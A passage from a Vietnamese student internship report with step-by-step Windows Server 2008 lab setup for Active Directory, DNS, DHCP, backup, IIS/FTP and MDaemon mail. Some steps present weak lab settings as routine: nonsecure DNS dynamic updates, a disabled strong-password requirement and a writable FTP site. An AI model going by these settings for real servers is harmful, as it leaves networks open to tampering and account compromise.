42Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Để lại thư mục Database, Log Files và SYSVOL ,kích Next.
43Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong Directory Service Restore Mode Administrator Password, nhập
một mật khẩu mạnh vào các hộp nhập liệu Password và Confirm password.
Xác nhận các thông tin trên trang Summary và kích Next.
44Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Active Directory sẽ cài đặt. Đặt một dấu kiểm vào hộp chọn Reboot on
completion để máy tính sẽ tự động khởi động lại khi cài đặt DC được hoàn tất.
Tham khảo video tại: http://www.youtube.com/watch?v=6CXrntG26r4
45Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
CHƯƠNG 6: JOIN DOMAINChỉnh ip của máy Windows 7 sao cho cùng địa chỉ của lớp mà ta đã chọn ở
máy Server. Gateway và DNS trỏ về địa chỉ ip của máy Server.
Vào Start click phải computer chọn properties. Chọn change settings.
46Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Click vào mở hộp thoại change.
47Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Nhập domain của máy server vào -> OK
Nhập Administrator và pass.
Click OK.
48Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Ta vào lại thấy hộp thoại đã có domain.
Tham khảo video tại: http://www.youtube.com/watch?v=NS525zebpx4
CHƯƠNG 7: TRIỂN KHAI CÁC DỊCH VỤ MẠNG
I. DỊCH VỤ DNS
1. Giới thiệu về DNSDNS (Domain Name System) Server là máy chủ được dùng để phân giải
domain thành địa chỉ IP và ngược lại. Về cách thức hoạt động, DNS Server lưu trữ
49Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
một cơ sở dữ liệu bao gồm các bản ghi DNS và dịch vụ lắng nghe các yêu cầu.Khi
máy client gửi yêu cầu phân giải đến, DNS Server tiến hành tra cứu trong cơ sở dữ
liệu và gửi kết quả tương ứng về máy client.
2. Cài đặt DNSVào Server Manager Roles Add Roles.Tại bảng Select Server Roles, chọn
DNS Server
- Sau đó nhấn Next để tiếp tục
- Chọn Instal. Tại bảng Confirm Installation Selections xác nhận việc cài đặt.
50Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
- Chọn Close để hoàn tất cài đặt.
3. Cấu hình DNS- Đối với DNS Server,thông thường nên xây dựng đồng thời hai hệ thống là DNS
Server chính (Primary) và DNS Server dự phòng (Secondary) dùng chung một cơ
51Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
sở dữ liệu. Với phương pháp này,sẽ hạn chế khả năng dịch vụ DNS bị ngưng khi
có sự cố xảy ra trên hệ thống.
- Vào Start Administrative Tools DNS.
- Nhấp chuột phải vào Forward Lookup Zones và chọn New Zone.
-
Tại bảng Welcome to the New Zone Wizard ,chọn Next
52Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
- Tại bảng Zone Type chọn Primary zone để cấu hình DNS Server chính.
- Chọn Next. Tại bảng Zone Name gõ tên domain vào.
-
Chọn
Next. Tại bảng Zone File, để mặc định. Chọn Next.
53Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
- Chọn Next. Tại bảng Completing the New Zone Wizard xem lại thông tin.
- Sau đó chọn Finish để hoàn tất.
- Nhấp chuột phải vào Reverse Lookup Zones và chọn New Zone.
54Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
- Tại bảng Welcome to the New Zone Wizard chọn Next.
- Tại bảng Zone Type chọn Primary zone để cấu hình chức năng reverse cho DNS
Server chính.
- Chọn Next.Tại bảng Reverse Lookup Zone Name chọn kiểu IP cần phân giải. Ở
đây chọn IPv4.
55Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
- Chọn Next. Điền Network ID và chọn Next.
- Tại bảng Zone File để mặc định. Chọn Next.
- Tại bảng Dynamic Update chọn Allow both nonsecure dynamic updates.
56Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
- Chọn Next và xem lại thông tin thiết lập, và sau đó chọn Finish để kết thúc.
Bổ sung các bản ghi DNS vào DNS Server
- Vào Start Administrative Tools DNS. Nhấp chuột phải vào zone và chọn
New
- Gõ tên host vào mục Name, gõ địa chỉ IP vào mục IP address. Nếu muốn tạo ra
một bản ghi DNS phân giải ngược tương ứng thì đánh dấu chọn Create associated
pointer (PTR) record.
57Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
- Sau đó chọn Add Host.Xuất hiện thông báo thành công.
Kiểm tra
Tham khảo video tại: http://www.youtube.com/watch?v=KTge5mwqsoY
Dịch vụ DHCP
II. GIỚI THIỆU DỊCH VỤ DHCP Dịch vụ DHCP cho phép chúng ta cấp động các thông số cấu hình mạng cho
các máy trạm.(client).
Cơ chế sử dụng các thông số mạng được cấp phát động có ưu điểm hơn so
với cơ chế khai báo tĩnh các thông số mạng như:
Khắc phục được tình trạng đụng địa chỉ IP và giảm chi phí quản trị cho hệ
thống mạng.Giúp cho các nhà cung cấp dịch vụ (ISP) tiết kiệm được số
lượng địa chỉ IP thật (Public IP).Phù hợp cho các máy tính thường xuyên di
58Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
chuyển qua lại giữa các mạng.Kết hợp với hệ thống mạng không dây
(Wireless) cung cấp các điểm Hotspot như: nhà ga, sân bay, trường học…
1. Hoạt động của giao thứcGiao thức DHCP làm việc theo mô hình client/server.Khi máy client khởi
động, máy sẽ gửi broadcast gói tin DHCPDISCOVER, yêu cầu một server phục vụ
mình. Gói tin này cũng chứa địa chỉ MAC của máy client.Các máy Server trên
mạng khi nhận được gói tin yêu cầu đó, nếu còn khả năng cung cấp địa chỉ IP, đều
gửi lại cho máy Client gói tin DHCPOFFER, đề nghị cho thuê một địa chỉ IP trong
một khoản thời gian nhất định, kèm theo là một subnet mask và địa chỉ của Server.
2. Cài đặt trên windows server 2008- Vào Server Manger Roles Add Roles.
Nhấn Next trong mục Roles chọn “DHCP Server”. Nhấn Next.
59Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong bảng này giới thiệu về DHCP và các điểm cần lưu ý Things to Note.
Tiếp tục nhấn Next.
Chọn card mạng sử dụng dịch vụ này ở đây chúng ta chỉ có một card mạng nên
tiếp tục nhấn Next nhấn Next.
- Trong mục “Parent Domain” điền tên domain và điền IP DNS server ở mục
“Preferred DNS…” và nhấn Validate để kiểm tra và xác nhận tồn tại và tiếp tục
nhấn Next.
60Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
-
Tiếp tục
nhấn Next.
Tiếp tục bấm Next. Trong Bảng Configure DHCPv6 Stateless Mode ta
chọn Disable DHCPv6 stateless mode for this server và bấm Next
61Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
-
Chọn user có quyền Author Next.
Xác nhận lại thông tin trước khi cài đặt dịch vụ DHCP. Bấm Install để cài đặt
- Cài đặt Role hoàn tất, và nhấn Close
62Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
63Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
3. Cấu hình DHCP
3.1. Tạo ScopVào Administrative Tools DHCP.
Nhấn chuột phải vào IPv4 và New Scope.
Hộp thoại New Scope hiện ra và Next.
-
Hộp thoại Scope Name và Điền tên của scope vào mục Name và nhấn Next.
64Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
- Hộp thoại IP Address Range, điền thông số range IP cấp phát và subnet mask
Next.
- Hộp thoại Lease Duration: thời gian thuê địa chỉ IP mặc định là 8 ngày
65Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
- Hộp thoại Configuration DHCP Options yêu cầu chúng ta cấu hình thông số
dịch vụ của scope ngay bây giờ hoặc để sau. Ở đây ta chọn No, I will configure
these option later và nhấn Next.
Bấm Fisnish để kết thúc
3.2 Thay đổi options của Scope- Xổ scope cần thao tác và chuột phải scope options Configure Options.
- Hộp thoại Scope Options hiện ra, ở trường Available Options là những thuộc tính
sẵn sàng mà chúng ta có thể thay đổi với những thuộc tính đã stick là những thuộc
tính đã được cấu hình trước đó.
- Chúng ta sẽ thử cấu hình default gateway lại cho scope này, chọn Router. Router
Options hiện ta cho chúng ta thêm xóa và edit với những thuộc tính khác cũng vậy.
66Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Kiểm tra
CHƯƠNG 8: BACKUPWindows Server Backup là một thành phần được xây dựng trong
Windows Server 2008 , bao gồm Microsoft Management Console (MMC) snap-in, một công cụ dòng lệnh và Windows PowerShell cmdlets. Windows Server Backup giống như phiên bản tiền nhiệm của nó - Ntbackup (trên Windows Server 2000/2003) - cung cấp một giải pháp hoàn chỉnh để backup dữ liệu hàng ngày và khôi phục lại khi cần thiết.
Windows Server 2008 R2 có các tính năng mới mở rộng giúp bạn có thể backup, lưu trữ các bản backup và làm thế nào để phục hồi lại từ backup.
67Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Lưu ý: Một điểm cần nhớ là không thể sử dụng Windows Server Backup để khôi phục bản sao lưu đã được tạo ra bởi Ntbackup. Tuy nhiên hiện có một phiên bản chỉ đọc của Ntbackup (miễn phí) có thể giúp bạn khôi phục dữ liệu được tạo ra bởi Ntbackup.
Backup với Windows Server Backup
Bạn có thể sử dụng Windows Server Backup để backup toàn bộ server (tất cả các volume), một danh sách lựa chọn các volume, một phân vùng hệ thống hoặc một thư mục/file cụ thể.
Lưu ý: Trong Windows Server 2008 RTM bạn sẽ bị hạn chế những mục có thể backup, chỉ có vài lựa chọn là volume và toàn bộ server.
Bạn có thể sử dụng Windows Server Backup để tạo và quản lý các bản backup cho một máy tính cục bộ hoặc từ xa, có thể lên lịch trình để chạy backup tự động.
Cài đặt Windows Server Backup
Khi thêm tính năng Windows Server Backup Features và các thành phần cấp dưới, bạn cần cài đặt các công cụ sau:
Windows Server Backup Microsoft Management Console (MMC) snap-in Wbadmin command-line tool Windows PowerShell cmdlets for Windows Server Backup
Để cài đặt Windows Server Backup, có thể sử dụng một trong 3 phương pháp sau:
Sử dụng Server Manager Sử dụng Servermanagercmd.exe Sử dụng PowerShell
Để cài đặt Windows Server Backup, đăng nhập vào máy tính bằng tài khoản Administrator hoặc tài khoản có cấp quyền quản trị.
1. Cài đặt Windows Server Backup sử dụng Server Manager
- Mở Server Manager
- Kích Features
- Kích Add Features
- Trong trang Add Features Wizard, cuộn chuột xuống dưới và chọn Windows Server Backup features. Nếu bạn cũng muốn sử dụng các mẫu
68Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
lệnh PowerShell, chọn thêm Command Line Tools. Bạn không cần việc thêm này nếu chỉ muốn sử dụng GUI hoặc công cụ dòng lệnh WBADMIN. Kích Next.
Trong hộp thoại Server Manager -> Add Features
69Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong hộp thoại Add Features Wizard -> Windows Server backup features.
- Trong trang Confirm Installation Selections, kích Install.
70Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Click close.
- Không cần khởi động lại server sau khi thiết lập xong.
71Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
2. Cài đặt Windows Server Backup sử dụng Servermanagercmd.exeSử dụng lệnh Servermanagercmd.exe là cách dễ dàng, tuy nhiên lệnh này có
thể bị phản đối trong các phiên bản Windows sau này, do đó không được sử dụng
nó quá nhiều...
- Mở cửa sổ lệnh với quyền quản trị cấp cao (chuột phải vào CMD và chọn Run as
Administrator).
- Nhập: servermanagercmd -i Backup-Features
3. Cài đặt Windows Server Backup sử dụng PowerShellTrong Windows Server 2008 R2, PowerShell được cài đặt mặc định. Tuy
nhiên, để cài đặt các role bằng công cụ này, bạn cần phải import vào module
Server Manager.
- Mở một cửa sổ PowerShell với quyền cấp cao (chuột phải vào PowerShell và
chọn Run as Administrator)
- Nhập: Import-Module servermanager
- Sau khi import, nhập: Add-WindowsFeature Backup-Features
72Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
4. BACKUP windows thông thường.Tiến hành phân chia ổ đĩa. Start-> Server Manager -> Stor Age -> Disk
Management -> Shink volume.
73Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
74Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Chọn 10000 và Shink tiếp theo.
Mở new simple volume.
Trong New Simple Volume Wizard -> Next.
75Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong New Simple Volume Wizard -> Next.
Trong New Simple Volume Wizard -> Next.
76Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong New Simple Volume Wizard -> Next
Trong New Simple Volume Wizard ->Đánh dấu vào ô Pefom a quick fomat.
77Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong New Simple Volume Wizard -> Finish
Chọn Backup Once.
78Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong hộp thoại Backup Once Wizard ->Next.
Trong hộp thoại Backup Once Wizard -> Next.
79Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong hộp thoại Backup Once Wizard -> Next.
Trong hộp thoại Backup Once Wizard. Chọn ổ đĩa mới chia-> Next.
80Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong hộp thoại Backup Once Wizard -> Next -> Yes.
81Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong hộp thoại Backup Once Wizard -> Next.
Trong hộp thoại Backup Once Wizard -> Backup.
82Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Ta thử xóa thư mục nào đó trong ổ đĩa.
Chọn thư mục Recover trong hộp thoại Windows Server backup.
83Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong hộp thoại Recovery Wizard. Click Next.
84Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Click Next.
Click Next.
85Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong hộp thoại Recovery Wizard. Chọn thư mục mình muốn khôi phục lại->
Next.
Trong hộp thoại Recovery Wizard. Click Next.
86Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong hộp thoại Recovery Wizard. Chọn recover.
87Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong hộp thoại Recovery Wizard. Chọn close.
Vào computer kiểm tra xem thư mục hien co được khôi phục lại được chưa.
Kiểm tra.
88Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
CHƯƠNG 9: IIS-WEB-FTP
I. Tiến hành cài đặt web iis và FTP.Vào Server Manager (Start => Programs => Administrative Tools => Server
Manager).
Click next
89Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Chuột phải vào Roles , bên cột trái chọn Add Roles.Trong bản Add Roles Wizard
đánh dấu IIS (WebServer) -> install
90Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Click Next.
Chọn Basic Authemtication-> Next.
91Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Chọn FTP Publishing Server -> Next.
92Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Click Install.
II. cấu hình Web IIS Khởi động Internet Information Services (IIS) Manager . này được tìm thấy
bằng cách nhấn vào nút "Start"> Administrative Tools > Internet Information
Services (IIS) Manager.
93Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong hộp thoại Internet Information Services (IIS) Manager -> site -> add web
site
94Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Tạo thư mục Athena.edu.vn trong ổ đĩa C-> tạo thư mục index.htm
95Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Vào windows 7 truy cập vào trang www.athena.edu.vn
96Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
III. cấu hình FTP.Tạo thư mục FTP, thư mục này share file cho nó.
Chuột phải vào FTP -> chọn Properties. Trong FTP properties -> Advanced
Sharing. Tick vào share this folder. Chọn Allow.
97Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
98Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Khởi động Internet Information Services (IIS) 6.0 Manager. này được tìm
thấy bằng cách nhấn vào nút "Start"> Administrative Tools > Internet Information
Services (IIS) 6.0 Manager.
99Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
chọn Add FTP Site
100Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong FTP Site Creation Wizard -> Next.
Nhập vào tên bất kì. Vd: athena
101Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong FTP Site Creation Wizard -> nhập ip của máy: 192.168.1.1 -> Next.
Trong FTP Site Creation Wizard -> Next.
102Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Chọn đường dẫn của thư mục FTP.
Trong FTP Site Creation Wizard -> đánh dấu vào Read và Wite -> Next.
103Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong FTP Site Creation Wizard -> Finish.
Trong Internet Information Services (IIS) 6.0 Manager -> start thư mục vừa
mới tạo.
104Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Qua windows 7 vào ftp://192.168.1.1
105Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
CHƯƠNG 10: MAIL
I. Chuẩn bị:1 máy server windows server 2008
Địa chỉ ip: 192.168.1.1
1 máy client windows 7
Địa chỉ ip: 192.168.1.2
II. Tiến hành cài đặt MDeamon v10. Khởi chạy file exe.
MDaemon, chương trình quản trị email server của Alt-N Technologies, có
rất nhiều đặc tính tác dụng phong phú, linh hoạt, an toàn và dễ sử dụng. Đây là một
trong những công nghệ quản trị email có giá trị nhất dành cho các tổ chức có từ 6
cho tới cả vài ngàn người dùng và bao gồm cả các nhà cung cấp dịch vụ Internet.
Trong bài viết đầu về MDaemon, mình sẽ trình bay qua về cách cài đặt MDaemon
trên Windows Server 2008.
Khi chạy Setup, màng hình Welcome xuất hiện. Nhấn Next.
Đọc sơ qua một số quy định của nó rồi nhấn I Agree.
106Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Chọn vị trí cài đặt của MDaemon rồi nhấn Next.
Click Next
107Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Click Next
Nhập vào domain là Athena.edu.vn -> Next
108Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Khai báo tài khoản Administrator cho Mail Server.
Nhập địa chỉ DNS của server vào.
109Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Chọn Set up MDaemon as an auto-starting system service nếu bạn muốn
MDaemon Mail Server khởi động cùng với Server.
Quá trình cài đặt diễn ra
110Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Click Finish.
III. tiến hành gửi nhận mail.Khởi động MDeamon
111Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Nếu quá trình cài đặt thành công, bạn sẽ có kết quả như hình dưới đây.
112Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Tick bỏ ô Requite strong password -> OK
113Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Account -> New Account
Nhập tên cho client ->OK. Sau đó chon Account -> edit
114Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Truy cập vào www.athena.edu.vn:3000
115Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Bên phía client.
116Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Tiến hành soạn thư gửi qua server.
Server nhận từ client.
117Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Soạn thư gửi từ server qua client.
Client nhận từ Server
Tham khảo video tại: http://www.youtube.com/watch?v=snVjWp_PpTk
118Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
CHƯƠNG 11: MÔ HÌNH MULTIMASTER.I. Replication Multimaster.( đa chủ nhân rộng)
Active Directory sử dụng sao chép đa để thực hiện việc đồng bộ hóa thông tin thư mục. Đúng sao chép đa có thể được đối với các dịch vụ thư mục khác sử dụng một master-slave cách tiếp cận để cập nhật tất cả các bản cập nhật đó phải được thực hiện cho các bản sao chủ của thư mục và sau đó được nhân rộng đến các bản sao nô lệ. Hệ thống này là đủ cho một thư mục mà có một số lượng nhỏ các bản sao và cho một môi trường mà tất cả các thay đổi có thể được áp dụng trực thuộc Trung ương. Nhưng phương pháp này không quy mô ngoài tổ chức quy mô nhỏ cũng không đáp ứng nhu cầu của các tổ chức phân cấp. Với Active Directory, không có một bộ điều khiển tên miền là bậc thầy. Thay vào đó, tất cả các bộ điều khiển miền trong một miền là tương đương. Thay đổi có thể được thực hiện cho bất kỳ bộ điều khiển miền, không giống như một hệ thống duy nhất-master, mà sự thay đổi phải được thực hiện với một máy chủ. Trong hệ thống đơn chủ, máy chủ chính sao chép các thông tin cập nhật cho tất cả các máy chủ thư mục khác trong miền.
Với sao chép đa, nó không phải là cần thiết cho tất cả các bộ điều khiển miền để nhân rộng với tất cả các bộ điều khiển tên miền khác. Thay vào đó, hệ thống thực hiện một cách mạnh mẽ các kết nối với bộ điều khiển xác định miền tái tạo mà các bộ điều khiển tên miền khác để đảm bảo rằng mạng không bị quá tải với lưu lượng truy cập sao chép và nhân rộng độ trễ không phải là quá dài mà nó gây ra sự bất tiện cho người sử dụng. Tập hợp các kết nối thông qua đó thay đổi được nhân rộng để điều khiển tên miền trong một doanh nghiệp được gọi là cấu trúc liên kết nhân rộng .
